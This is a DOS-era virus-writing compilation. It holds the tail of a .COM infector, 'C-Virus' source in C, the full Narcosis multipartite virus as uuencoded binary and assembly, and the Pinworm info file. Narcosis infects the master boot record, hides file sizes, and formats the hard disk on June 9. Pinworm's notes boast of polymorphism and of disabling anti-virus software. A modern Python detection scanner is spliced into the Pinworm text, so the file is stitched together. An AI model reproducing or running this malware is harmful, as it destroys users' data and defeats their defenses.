mov cx,4 ; Read 4 bytes lea dx,[bp+offset return_bytes] ; Load the offset dx int 21 ; dos call lea di,[bp+offset return_bytes+3] ; Load the offset of ; the fourth byte ; we just read into ; the virus cmp byte ptr ds:[di],90 ; Is this byte a nop? 
je nxtvic ; If so assume infected, ; close file, and run ; infection cycle again mov ax,4200 ; Goto beginning of file xor cx,cx ; cx must be 0 xor dx,dx ; dx must be 0 int 21 ; dos call mov ah,40 ; Write file mov cx,4 ; Write four bytes lea dx,[bp+offset jump_address] ; Load the offset of ; the bytes to write ; (which is our jmp constuction) int 21 ; dos call mov ax,4202 ; Goto end of file xor cx,cx ; cx must be 0 xor dx,dx ; dx must be 0 int 21 ; dos call call what ; this is the actual part tha writes jmp $+2 ; thanks again screaming exit_n: mov cx,[bp+time] ; Write the original date mov dx,[bp+date] ; back to the infected file mov ax,5701 ; dos write date function int 21 ; dos call mov ah,3e ; Close the file, the ; infection is complete int 21 ; dos call cmp [bp+counter],03 ; how many files do you want to infect? je exit_error nxtvic: mov ah,4f ; Continue the infection ; process. Find the next match! jmp get_f ; Doit again, and stop only ; when int 21 ah=4f reports ; no more matches! exit_error: cli ; clear interupts mov ah,1a ; Set DTA mov dx,80 ; Change to original DTA int 21 ; dos call mov bx,102 ; Set bx to 102 pop [bx] ; pop the last two saved ; bytes into ds:[102] dec bx ; decrease bx so that is dec bx ; points to 100 pop [bx] ; pop the first two saved ; bytes into ds:[100] push bx ; bx=100 xor ax,ax ; most viruses don't do this xor bx,bx ; sequence, but since some xor cx,cx ; programs assume the reg's xor dx,dx ; are set to 0 like they xor bp,bp ; should be, this is an xor si,si ; extra precaution. xor di,di ret ; return to host ntzmask db '*.NTZ',0 buff db ? date dw ? time dw ? filemask db '*M.COM',0 ; Look for *.com's jump_address db 0e9,0,0,90 ; jmp xx xx+3, and 90 is the new_dta dw ? ; infection marker how_much dw ? 
return_bytes db 0cdh,20,0,0 ; simple way to end the ; first generation (it's end_it: ; the same as saying int 20) end start end code % C_Virus % ~~~~~~~~~~~ /* C-Virus: A generic .COM and .EXE infector Written by Nowhere Man Project started and completed on 6-24-91 Written in Turbo C++ v1.00 (works fine with Turbo C v2.00, too) */ #pragma inline // Compile to .ASM #include #include #include #include #include void hostile_activity(void); int infected(char *); void spread(char *, char *); void small_print(char *); char *victim(void); // #define DEBUG #define ONE_KAY 1024 // 1k #define TOO_SMALL ((6 * ONE_KAY) + 300) // 6k+ size minimum #define SIGNATURE "NMAN" // Sign of infection int main(void) { /* The main program */ spread(_argv[0], victim()); // Perform infection small_print("Out of memory\r\n"); // Print phony error return(1); // Fake failure... } void hostile_activity(void) { /* Put whatever you feel like doing here...I chose to make this part harmless, but if you're feeling nasty, go ahead and have some fun... */ small_print("\a\a\aAll files infected. 
Mission complete.\r\n"); exit(2); } int infected(char *fname) { /* This function determines if fname is infected */ FILE *fp; // File handle char sig[5]; // Virus signature fp = fopen(fname, "rb"); fseek(fp, 28L, SEEK_SET); fread(sig, sizeof(sig) - 1, 1, fp); #ifdef DEBUG printf("Signature for %s: %s\n", fname, sig); #endif fclose(fp); return(strncmp(sig, SIGNATURE, sizeof(sig) - 1) == 0); } void small_print(char *string) { /* This function is a small, quick print routine */ asm { push si mov si,string mov ah,0xE } print: asm { lodsb or al,al je finish int 0x10 jmp short print } finish: asm pop si } void spread(char *old_name, char *new_name) { /* This function infects new_name with old_name */ /* Variable declarations */ FILE *old, *new; // File handles struct ftime file_time; // Old file date, time int attrib; // Old attributes long old_size, virus_size; // Sizes of files char *virus_code = NULL; // Pointer to virus int old_handle, new_handle; // Handles for files /* Perform the infection */ #ifdef DEBUG printf("Infecting %s with %s...\n", new_name, old_name); #endif old = fopen(old_name, "rb"); // Open virus new = fopen(new_name, "rb"); // Open victim old_handle = fileno(old); // Get file handles new_handle = fileno(new); old_size = filelength(new_handle); // Get old file size virus_size = filelength(old_handle); // Get virus size attrib = _chmod(new_name, 0); // Get old attributes getftime(new_handle, &file_time); // Get old file time fclose(new); // Close the virusee _chmod(new_name, 1, 0); // Clear any read-only unlink(new_name); // Erase old file new = fopen(new_name, "wb"); // Open new virus new_handle = fileno(new); virus_code = malloc(virus_size); // Allocate space fread(virus_code, virus_size, 1, old); // Read virus from old fwrite(virus_code, virus_size, 1, new); // Copy virus to new _chmod(new_name, 1, attrib); // Replace attributes chsize(new_handle, old_size); // Replace old size setftime(new_handle, &file_time); // Replace old time /* Clean up */ 
fcloseall(); // Close files free(virus_code); // Free memory } char *victim(void) { /* This function returns the virus's next victim */ /* Variable declarations */ char *types[] = {"*.EXE", "*.COM"}; // Potential victims static struct ffblk ffblk; // DOS file block int done; // Indicates finish int index; // Used for loop /* Find our victim */ if ((_argc > 1) && (fopen(_argv[1], "rb") != NULL)) return(_argv[1]); for (index = 0; index < sizeof(types); index++) { done = findfirst(types[index], &ffblk, FA_RDONLY | FA_HIDDEN | FA_SYSTEM | FA_ARCH); while (!done) { #ifdef DEBUG printf("Scanning %s...\n", ffblk.ff_name); #endif /* If you want to check for specific days of the week, months, etc., here is the place to insert the code (don't forget to "#include "!) */ if ((!infected(ffblk.ff_name)) && (ffblk.ff_fsize > TOO_SMALL)) return(ffblk.ff_name); done = findnext(&ffblk); } } /* If there are no files left to infect, have a little fun... */ hostile_activity(); return(0); // Prevents warning } % Narcosis.asm % ~~~~~~~~~~~~~~~~ ÄÄÍÍþ Narcosis virus þÍÍÄÄ By Evil Avatar þ COM/EXE/OVL infections þ Multipartite þ Direct and indirect infections þ Sub-stealth capabilities þ No CHKDSK errors ÄÄÍÍþ Narcosis virus þÍÍÄÄ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- section 1 of uuencode 5.24 of file narcosis.com by R.E.M. 
begin 644 narcosis.com M&AX``+@!^KI%6F0>, MAIL'Q!Z$`(F>G0>,AI\'!PX?C;8``"O_5[G2`_.EZ)(#'_K'!DP`8`2,!DX` MQP:$`%@!C`:&`/NX046[047-(1X'*]N!_*W>=1X&'XS`!1``+@&&;@4N`X9H M!?J.T(NF:@7[+O^N;`4.'PX'OP`!5XVV;`6DI<,>OP!\5[Z7!1X'#A^Y``'S MI08?#@<>@?J``'0%4N@<`UH?+L<&<`0``,0>3``NB1Z9!RZ,!IL'^L<&3`!O M!(P.3@#[R^@H!(ORK#PN=`D\`'7WZ"X$ZUVL)%^*V*TE7U^`^T-T$8#[1703 M@/M/=>,]5DQT$.O*\".V,0>D``NB1ZA!RZ,!J,'QP:0`#\%C`Z2`!^T/>CT`E"[(!*3 MS2^X%A(KVR:*'^EP6_;`6DI2T#`,8&EP7IHY@%ZVB#Q`CIE0"#/J,%_W7S4U!2 M#@>^I06_:`7\I:5&1J6E@P:A!7RAGP6Q!-/@D5I84%(KP8/:`+D0`/?QHZT% MB1:K!:.E!<<&IP6MWEI8!9<%@](`N0`"]_%0"])T`4"CFP58@.0!HYD%6U\' MM$"YEP69Z`4")L=%%0``)L=%%P``M$"Y&@"ZEP7H[@&X`5=:68'"`,CHX@'& M!J4#`;0^Z-@!*\".V"[$%J$'B1:0`(P&D@#HX`'I#O[K/)`````````````` M```````````````````````````````````````````````````````````` M`````"O`CMCZCM"\`'S[@RX3!`*+'A,$L0;3XX[#N`0"*]NY`2?-$U*T!,T: M@?H)!G0*6@:XT0!0RT5!`+L`4([#NH``*\"Y`0#-$[@)`\T3_L6`Y4!U]/[& MZ^D&'[@!`KN7!;D!`+J``,T3@3[-!45!=#JX`0.[EP6Y`@"Z@`#-$[@$`RO; MN0,`NH``S1/'!M4#`P"_EP6^M0.Y+`#SI;@!`[N7!;D!`+J``,T3PX#\`G1& M@/P#=$$N_RZ9!^D``.C+`/TKP([`)L4>A`",V#T`"'<@#A^_GP>'!:]T%HD= M^B;'!H0`6`$FC`Z&`/O'!G`$[O_HJP#KM2Z)%J4#G"[_'ID'4%:@.Y.P#SI+@!`[MW`[D!`,<&U0,!)^@F`'(@N`0#*]NY`2?H&0#K M$RO`Z!(`N`$"NY<%N0$`Z`8`<[GH)`#/G"[_'ID'PYPN_QZ=!\//+H\&EP=0 M4U%25597'@:<+O\FEP75I96U@N_R:7!P````#-(```*BXJ D``!5JEM.87)C;W-I========================================================= ; ; Narcosis Virus ; (c) 1994 Evil Avatar ; ; TASM /M3 NARCOSIS ; TLINK /X NARCOSIS ; EXE2BIN NARCOSIS NARCOSIS.COM .model tiny .code org 0 ID equ 666h VMEM equ (Virus_end-Narcosis+15)/16+1 VSIZEK equ (Virus_end-Narcosis+1023)/1024 V_FILE equ (heap-Narcosis) ;=====( Entry point for COM/EXE files )==================================== Narcosis: sbb bl, byte ptr ds:[0] ;new stealth technique mov ax, 0fa01h mov dx, 5945h int 16h ;disable MSAV push ds ;save PSP segment call delta bye_bye: jmp format delta: pop bp sub bp, offset bye_bye ;get delta offset mov ah, 2ah int 21h ;check the date cmp dx, 609h 
;is it June 9th? je bye_bye ;yes? say your prayers lamer mov ah, 30h mov bx, ID int 21h ;installation check cmp al, 3 ;are we installed? jb install_done ;why yes, yes we are! mov ax, ds dec ax ;get MCB segment mov ds, ax ;move MCB segment into ds cmp byte ptr ds:[0], 'Z' ;is it last MCB in chain? jnz install_done ;no? don't install self sub word ptr ds:[3], VMEM ;shrink host allocation sub word ptr ds:[12h], VMEM ;alter PSP memory size field mov es, word ptr ds:[12h] ;get new virus segment sub ax, ax mov ds, ax ;BIOS data table/IVT sub byte ptr ds:[413h], VSIZEK ;shrink memory size (int 12h) push es ;save virus segment les bx, dword ptr ds:[13h*4] ;get int 13h vector mov word ptr ss:[bp+save_13], bx mov word ptr ss:[bp+save_13+2], es ;save int 13h vector les bx, dword ptr ds:[21h*4] ;get int 21h vector mov word ptr ss:[bp+save_21], bx mov word ptr ss:[bp+save_21+2], es ;save int 21h vector pop es ;get virus segment push cs pop ds ;ds now equals cs lea si, [bp+offset Narcosis] ;start of virus code sub di, di push di mov cx, (Virus_end-Narcosis)/2 ;size of virus in words rep movsw ;copy virus to upper memory call infect_hd pop ds cli ;clear interrupts mov word ptr ds:[13h*4], offset int13 mov word ptr ds:[13h*4+2], es ;set new int 13h vector mov word ptr ds:[21h*4], offset int21 mov word ptr ds:[21h*4+2], es ;set new int 21h vector sti ;allow interrupts install_done: mov ax, 4541h mov bx, 4541h int 21h ;infect a file push ds ;restore PSP segment pop es ;in both ds and es sub bx, bx ;clear ID so host won't ;accidently use it cmp sp, 0deadh ;is this an .exe file? jne return_com ;no? restore com stuff push es pop ds mov ax, es ;ax=PSP segment add ax, 10h ;adjust for PSP size add word ptr cs:[bp+comsave+2], ax ;set up cs add ax, word ptr cs:[bp+ss_sp] ;set up ss cli ;clear ints for stack manipulation mov ss, ax ;set ss mov sp, word ptr [bp+ss_sp+2] ;set sp sti ;restore ints jmp dword ptr cs:[bp+comsave] ;jump to old program return_com: push cs ;needed? 
pop ds ;ds=cs push cs ;needed? pop es ;es=cs mov di, 100h ;beginning of program push di ;for later return lea si, [bp+comsave] ;first 3 bytes of program movsb movsw ;restore first 3 bytes ret ;return to program ;=====( Entry point after boot sector retf )=============================== high_code: push ds mov di, 7c00h push di mov si, offset buffer push ds pop es push cs pop ds mov cx, 100h ;not very optimised rep movsw push es pop ds push cs pop es push ds cmp dx, 80h je next push dx call infect_hd pop dx next: pop ds mov word ptr cs:[int13b+1], 0 les bx, dword ptr ds:[13h*4] mov word ptr cs:[save_13], bx mov word ptr cs:[save_13+2], es cli mov word ptr ds:[13h*4], offset int13b mov word ptr ds:[13h*4+2], cs sti retf ;=====( Check file extension )============================================= check_ext: call push_all mov si, dx find: lodsb cmp al, '.' je found_ext cmp al, 0 jne find done_ext: call pop_all jmp dos21 found_ext: lodsb and al, 5fh mov bl, al lodsw and ax, 5f5fh cmp bl, 'C' je maybe_com cmp bl, 'E' je maybe_exe cmp bl, 'O' jne done_ext cmp ax, 'LV' je infect2 jmp done_ext maybe_com: cmp ax, 'MO' je infect2 jmp done_ext maybe_exe: cmp ax, 'EX' je infect2 jmp done_ext infect2: jmp infect_file2 ;=====( Interrupt 21h handler )============================================ int21: cmp ah, 30h ;installation check je install_check cmp ah, 11h ;find first je stealth_dir ;stealth cmp ah, 12h ;find next je stealth_dir ;stealth cmp ah, 4bh ;execute je _infect ;infect it cmp ah, 3dh ;open je check_ext ;infect it cmp ah, 41h ;delete je check_ext ;infect it cmp ah, 56h ;rename je check_ext ;infect it cmp ah, 43h ;attribs je check_ext ;infect it cmp ax, 4541h je go_infect dos21: jmp dword ptr cs:[save_21] ;jump to DOS int 21h _infect: jmp infect_file ;=====( Install check )==================================================== install_check: cmp bx, ID ;did virus call? jne dos21 ;no? 
call original interrupt mov al, 2 ;set return code iret ;return ;=====( Dir stealth )====================================================== stealth_dir: pushf call dword ptr cs:[save_21] call push_all test al, al jnz no_stealth mov ah, 51h int 21h mov es, bx cmp bx, es:[16h] jne no_stealth mov ah, 2fh int 21h cmp byte ptr ds:[bx], -1 jne not_extended add bx, 7 not_extended: cmp word ptr ds:[bx+19h], 0c800h jb no_stealth sub ds:[bx+19h], 0c800h sub ds:[bx+1dh], V_FILE sbb word ptr ds:[bx+1fh], 0 no_stealth: call pop_all iret ;=====( Direct infection routine )========================================= go_infect: sub ax, bx jnz dos21 push es pop ds mov byte ptr ds:[scratch], 0 mov dx, offset newDTA mov ah, 1ah call call21 mov ah, 4eh get_file: mov dx, offset files mov cx, 7 call call21 jc no_more mov ax, 3d00h mov dx, offset newDTA+1eh int 21h xchg ax, bx mov ah, 3eh call call21 cmp byte ptr ds:[scratch], 1 je no_more mov ah, 4fh jmp get_file no_more: pop bx es ax ds push ax es bx mov dx, 80h mov ah, 1ah call call21 iret ;=====( File infection routine )=========================================== infect_file: call push_all infect_file2: push ds sub ax, ax mov ds, ax ;interrupt vector table les bx, dword ptr ds:[24h*4] ;get int 24h vector mov word ptr cs:[save_24], bx mov word ptr cs:[save_24+2], es ;save it mov word ptr ds:[24h*4], offset int24 mov word ptr ds:[24h*4+2], cs ;set new int 24h pop ds mov ah, 3dh call call21 ;open file read only push ax ;save handle mov bx, 1220h xchg ax, bx ;put handle in bx int 2fh ;get job file table mov ax, 1216h sub bx, bx mov bl, byte ptr es:[di] ;get sft number for file handle int 2fh ;get address of sft mov word ptr es:[di+2], 2 ;set read/write pop bx ;restore handle push cs pop ds ;set ds for code segment reference mov ah, 3fh mov cx, 1ah mov dx, offset buffer call call21 ;read first 1ah bytes mov cx, word ptr es:[di+0dh] ;get time mov dx, word ptr es:[di+0fh] ;get date cmp dx, 0c800h ;check 100 years jae bad_date ;if so, already 
infect push cx dx es di ;save time and date mov ax, word ptr es:[di+11h] mov dx, word ptr es:[di+13h] mov word ptr es:[di+15h], ax mov word ptr es:[di+17h], dx cmp word ptr ds:[buffer], 'ZM' je exe_file cmp word ptr ds:[buffer], 'MZ' je exe_file ;if .exe file then infect it or dx, dx jnz bad_file cmp ax, 65535-(Virus_end-Narcosis) jnb bad_file cmp ax, 400h jb bad_file push cs pop es mov si, offset buffer mov di, offset comsave movsb movsw ;move combytes to comsave sub ax, 3 mov byte ptr ds:[buffer], 0e9h mov word ptr ds:[buffer+1], ax ;set up jump jmp write_virus bad_file: add sp, 8 bad_date: jmp close exe_file: cmp word ptr ds:[buffer+12], -1 jne bad_file push bx ax dx cs ;save handle pop es mov si, offset buffer+0eh mov di, offset ss_sp cld movsw movsw inc si inc si movsw movsw add word ptr ds:[buffer+0ah], VMEM ;new minimum memory mov ax, word ptr ds:[buffer+8] ;get header size mov cl, 4 shl ax, cl ;change to bytes xchg ax, cx ;save it pop dx ax push ax push dx ;save file size sub ax, cx sbb dx, 0 ;get new cs:ip mov cx, 10h div cx mov word ptr ds:[buffer+16h], ax ;set virus cs mov word ptr ds:[buffer+14h], dx ;set virus ip mov word ptr ds:[buffer+0eh], ax ;set virus ss mov word ptr ds:[buffer+10h], 0deadh ;set virus sp pop dx pop ax ;get file size add ax, (heap-Narcosis) adc dx, 0 ;add virus size mov cx, 200h div cx ;convert to pages push ax ;save it or dx, dx ;check for remainder je no_remainder ;no? 
skip it inc ax ;increment number of pages no_remainder: mov word ptr ds:[buffer+4], ax ;save number of pages pop ax and ah, 1 mov word ptr ds:[buffer+2], ax ;file size MOD 512 pop bx write_virus: pop di es mov ah, 40h mov cx, V_FILE cwd call call21 ;write virus to EOF mov word ptr es:[di+15h], 0 mov word ptr es:[di+17h], 0 mov ah, 40h mov cx, 1ah ;restore buffer size mov dx, offset buffer call call21 ;write header or jump mov ax, 5701h pop dx cx add dx, 0c800h ;add 100 years call call21 ;set file time and date mov byte ptr ds:[scratch], 1 close: mov ah, 3eh call call21 ;close file sub ax, ax mov ds, ax ;interrupt vector table les dx, dword ptr cs:[save_24] ;get int 24h vector mov word ptr ds:[24h*4], dx mov word ptr ds:[24h*4+2], es ;restore old int 24h vector call pop_all jmp dos21 ;return to caller ;=====( Boot Sector )====================================================== bootsec: jmp loader xchg ax, ax bootparms: newDTA db 2bh dup (?) scratch db 10h dup (?) loader: sub ax, ax mov ds, ax cli mov ss, ax mov sp, 7c00h sti sub word ptr ds:[413h], (virus_end-narcosis+1023)/1024 mov bx, word ptr ds:[413h] mov cl, 6 shl bx, cl mov es, bx mov ax, 200h+(heap2-narcosis+511)/512 sub bx, bx mov cx, 2701h sector equ $-2 int 13h push dx mov ah, 4 int 1ah cmp dx, 609h je format pop dx push es mov ax, offset high_code push ax retf sig db 'EA', 0 format: mov bx, 5000h mov es, bx mov dx, 80h next_head: sub ax, ax mov cx, 1 int 13h next_track: mov ax, 309h int 13h inc ch and ch, 40h jne next_track inc dh jmp next_head loader_end: ;=====( Infect master boot record )======================================== infect_hd: push es pop ds mov ax, 201h mov bx, offset buffer mov cx, 1 mov dx, 80h int 13h ;read in master boot record cmp word ptr ds:[buffer+(sig-loader)], 'AE' je infected mov ax, 301h mov bx, offset buffer mov cx, 2 mov dx, 80h int 13h ;write mbr to sector 2 mov ax, 300h+(heap2-narcosis+1ffh)/200h sub bx, bx mov cx, 3 mov dx, 80h int 13h ;write virus after partition table mov 
word ptr ds:[sector], 3 mov di, offset buffer mov si, offset loader mov cx, (offset loader_end-offset loader)/2 rep movsw ;copy loader onto boot code mov ax, 301h mov bx, offset buffer mov cx, 1 mov dx, 80h int 13h ;write infected master boot record infected: retn ;=====( Interrupt 13h handler )============================================ int13: cmp ah, 2 je infect_disk cmp ah, 3 je infect_disk bios13: jmp dword ptr cs:[save_13] int13b: db 0e9h, 0, 0 call push_all std sub ax, ax mov es, ax lds bx, dword ptr es:[21h*4] mov ax, ds cmp ax, 800h ja done13 push cs pop ds mov di, offset save_21+2 xchg ax, word ptr ds:[di] scasw je done13 mov word ptr ds:[di], bx cli mov word ptr es:[21h*4], offset int21 mov word ptr es:[21h*4+2], cs sti mov word ptr ds:[int13b+1], -((int13b-int13)+3) done13: call pop_all jmp int13 ;=====( Disk infection routine )=========================================== infect_disk: mov word ptr cs:[scratch], dx pushf call dword ptr cs:[save_13] push ax push si pushf mov si, sp mov ax, word ptr ss:[si] mov word ptr ss:[si+10], ax popf pop si pop ax call push_all ;save all the registers jc no_infect push cs cs pop ds es ;make ds, es equal cs mov dx, word ptr ds:[scratch] cmp dx, 80h ;is it a hard disk? jae no_infect ;yes? 
see if a boot sector read mov ax, 201h mov bx, offset buffer mov cx, 1 call call13 ;read boot sector from disk jc reset sig_check: cmp word ptr ds:[buffer+(sig-bootsec)], 'AE' je no_infect mov si, offset buffer+3 mov di, offset bootparms mov cx, 3bh rep movsb ;copy parameters to our boot block mov ax, 301h mov bx, offset bootsec mov cx, 1 mov word ptr ds:[sector], 2701h call call13 ;write boot sector to disk jc no_infect mov ax, 300h+((heap2-narcosis+511)/512) sub bx, bx mov cx, 2701h call call13 ;write virus to disk jmp no_infect reset: sub ax, ax call call13 mov ax, 201h mov bx, offset buffer mov cx, 1 call call13 jnc sig_check no_infect: call pop_all iret ;=====( Fake an int 13h call )============================================= call13: pushf call dword ptr cs:[save_13] retn ;=====( Fake an int 21h call )============================================= call21: pushf call dword ptr cs:[save_21] retn ;=====( Interrupt 24h handler )============================================ int24: iret ;just return ;=====( Push all registers )=============================================== push_all: pop word ptr cs:[p_all] ;save return address push ax bx cx dx bp si di ds es ;save registers pushf ;save flags jmp word ptr cs:[p_all] ;return to caller ;=====( Pop all registers )================================================ pop_all: pop word ptr cs:[p_all] ;save return address popf ;restore flags pop es ds di si bp dx cx bx ax ;restore registers jmp word ptr cs:[p_all] ;return to caller ;=====( End of boot sector )=============================================== ss_sp dd 0 ;old stack pointer comsave db 0cdh, 20h, 0, 0 files db '*.*', 0 bs_end: db 1feh-(bs_end-bootsec) dup (?) dw 0aa55h ;=====( Virus data area )================================================== virus db '[Narcosis]', 0 author db '(c) 1994 Evil Avatar', 0 heap: ;discardable variables buffer db 200h dup (?) ;buffer for file/disk reads heap2: ;save the boot sector p_all dw ? ;push/pop all return address save_13 dd ? 
;int 13h entry
save_21 dd ?                            ;int 21h entry
save_24 dd ?                            ;int 24h entry
Virus_end:
end Narcosis

% Pinworm.asm %
~~~~~~~~~~~~~~~

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ------
PiïWéRM v1.00 coded by ûirogen
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ------

Original Release: 06-03-94
Source Code Release: 07-05-94

Welcome to my latest viral creation -- PiïWérM version 1.00.

Definition - PINWORM: A parasite that crawls out your ass and lays little white eggs .. It's amazing what you can learn from Biology class.

PiïWérM is a memory resident, polymorphic, parasitic infector of COM and EXE files. Files become infected when they are executed. Eligible files are COMs which will not exceed the 64k boundary and EXE files smaller than approx 256k that are not "new-format" EXEs such as Windoze filez. COMMAND.COM may also become infected.

Original Infection Marker-
Infected EXE files have the checksum field in the header set to a random value other than 0. This should prevent anti-virus software from easily determining if an EXE is infected by a simple check of the header. Infected COM files will have the fourth byte set to 0.

Polymorphism-
This virus has 0 bytes constant and 0 ops in constant locations in the decryptor. It's fully polymorphic. The garbage code consists of randomly retrieved one-byte operands, OR a constant fill of a single one-byte operand. The virus selects between these types of garbage code randomly in order to prevent scanners from detecting the actual garbage code.

Anti-Anti virus-
When a file becomes infected, CHKLIST.MS and CHKLIST.CPS files are deleted in that directory. Also, when the user tries to execute EXE files ending in the characters 'AV', 'SCAN', or 'OT', the executable's minimum memory requirement in the header is changed to FFFFh, making the file unusable whether the virus is in memory or not. Pinworm also uses VSAFE and VWATCH's uninstall API as an installation check.
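The markers just described (a non-zero MZ checksum, FFFFh in the minimum-allocation field of the named anti-virus executables, a zero fourth byte in COM files), together with the ones the Narcosis and C-Virus listings above rely on (Narcosis sets the EXE initial SP to DEADh and pushes the file date 100 years ahead by adding 0C800h; C-Virus looks for "NMAN" at offset 28), are what a scanner of the period would key on. The Python below is an added example written for this page, not code from the zine or from any of the virus authors: it parses a minimal MZ header and reports each marker, flagging the two that clean files also trigger as weak. All sample images and the DOS date words are constructed inline; the function and constant names are the example's own.

```python
import struct

# Header offsets and marker values, all taken from the listings on this page.
MZ_MINALLOC = 0x0A          # Pinworm writes FFFFh here for *AV / *SCAN / *OT executables
MZ_SP = 0x10                # Narcosis writes DEADh here (its own install check)
MZ_CHECKSUM = 0x12          # Pinworm writes a random non-zero word here as its marker
CVIRUS_SIG_OFFSET = 28      # C-Virus reads 4 bytes at offset 28 of the file
CVIRUS_SIG = b"NMAN"
NARCOSIS_DATE_ADD = 0xC800  # 100 years in the packed DOS date word (bits 9..15 = year-1980)


def dos_date_year(date_word):
    """Decode the year from a packed DOS date word (year-1980 in the top 7 bits)."""
    return 1980 + (date_word >> 9)


def scan_image(data, date_word=None):
    """Return the infection indicators found in an executable image.

    data      -- raw bytes of a .COM or .EXE file
    date_word -- optional packed DOS date of the file (directory entry / SFT),
                 needed only for the Narcosis timestamp check
    """
    hits = []

    # C-Virus overwrites the host, so an infected file carries "NMAN" at offset 28.
    if data[CVIRUS_SIG_OFFSET:CVIRUS_SIG_OFFSET + 4] == CVIRUS_SIG:
        hits.append("C-Virus: signature NMAN at offset 28")

    if data[:2] in (b"MZ", b"ZM") and len(data) >= 0x1C:
        minalloc, = struct.unpack_from("<H", data, MZ_MINALLOC)
        init_sp, = struct.unpack_from("<H", data, MZ_SP)
        checksum, = struct.unpack_from("<H", data, MZ_CHECKSUM)
        if minalloc == 0xFFFF:
            hits.append("Pinworm: minimum allocation FFFFh (AV-kill)")
        if init_sp == 0xDEAD:
            hits.append("Narcosis: initial SP is DEADh")
        if checksum != 0:
            # Weak: some clean linkers fill this field too, so treat as corroborating only.
            hits.append("Pinworm: non-zero MZ checksum (weak)")
    elif len(data) >= 4 and data[0] == 0xE9 and data[3] == 0:
        # Weak: plenty of clean .COM files start with E9 xx xx followed by a zero byte.
        hits.append("Pinworm: COM jmp with fourth byte 0 (weak)")

    # Narcosis marks files by adding 100 years to the date; nothing legitimate dates 2080+.
    if date_word is not None and dos_date_year(date_word) >= 1980 + 100:
        hits.append("Narcosis: file date pushed 100 years ahead (year %d)" % dos_date_year(date_word))

    return hits


def make_mz_header(minalloc=0, init_sp=0x0100, checksum=0, tail=b"\0\0\0\0"):
    """Build a constructed 32-byte MZ header for testing; not a real program."""
    hdr = bytearray(32)
    hdr[0:2] = b"MZ"
    struct.pack_into("<H", hdr, MZ_MINALLOC, minalloc)
    struct.pack_into("<H", hdr, MZ_SP, init_sp)
    struct.pack_into("<H", hdr, MZ_CHECKSUM, checksum)
    hdr[CVIRUS_SIG_OFFSET:CVIRUS_SIG_OFFSET + 4] = tail
    return bytes(hdr)


if __name__ == "__main__":
    # Constructed samples; 0x1D81 is 1994-12-01 in packed DOS date form.
    samples = {
        "clean.exe": (make_mz_header(), 0x1D81),
        "narcosis.exe": (make_mz_header(init_sp=0xDEAD), 0x1D81 + NARCOSIS_DATE_ADD),
        "pinworm-av.exe": (make_mz_header(minalloc=0xFFFF, checksum=0x1234), None),
        "cvirus.exe": (make_mz_header(tail=CVIRUS_SIG), None),
        "pinworm.com": (b"\xE9\x10\x00\x00" + b"\x90" * 16, None),
    }
    for name, (image, date) in samples.items():
        print(name, scan_image(image, date))
```

The date check is the most reliable of these: DOS stores the year as an offset from 1980 in seven bits, so adding 0C800h moves any file written before 2080 into a range no legitimate timestamp reaches, which is exactly why Narcosis can use `cmp dx, 0c800h` as its own "already infected" test.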
When Pinworm checks itself for residency it also removes these shitty programs from memory.

Anti-Debugging-
This virus uses a double encryption technique to prevent debugging of the code. The first encryptor is of course polymorphic, while the second is there only to try and deter debuggers. It's hardly foolproof .. but nonetheless will keep out the ignorant.

Symptoms-
The user may notice a slight size increase for infected COM and EXE files. There may also be a total conventional memory size decrease of approx 5k; however, the virus randomly decides not to protect its code in memory. As stated above, CHKLIST.MS and CHKLIST.CPS files may be deleted, and "Not enough memory" errors may appear when trying to load many anti-virus applications.

Additional-
-Pinworm uses its own critical error handler.
-The virus is kept encrypted in memory.

Activation-
On the 1st of any month, Pinworm will continuously play with the keyboard lights and create directories named after itself. In these directories will be several files that together form a message from ûirogen to the general populace.

Length:
Code length - Approximately 1900 bytes
Added phile size - Varies from 1900-2200 bytes

Detected by: Nothing, nada, nope, kein
As of SCAN v2.00.0, F-PROT v2.11 and TBAV v6.20

Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--

Included in this archive should be:
INFECTED.COM - Infected phile, second generation
PINWORM.NFO  - This phile
PINWORM.ASM  - Assembly language source code

;
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ------
; PiïWéRM v1.00 coded by ûirogen
; þ Original Variant
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ------
;
; See enclosed NFO for more info..
;
; The code should be sufficiently commented - and I even ran it thru a
; filter to make it look perty.
;
; compile like so:
; TASM /m pinworm
; Tlink pinworm
; --convert to COM--
;
cseg segment
assume cs: cseg, ds: cseg, es: cseg, ss: cseg

; conditional compilation..
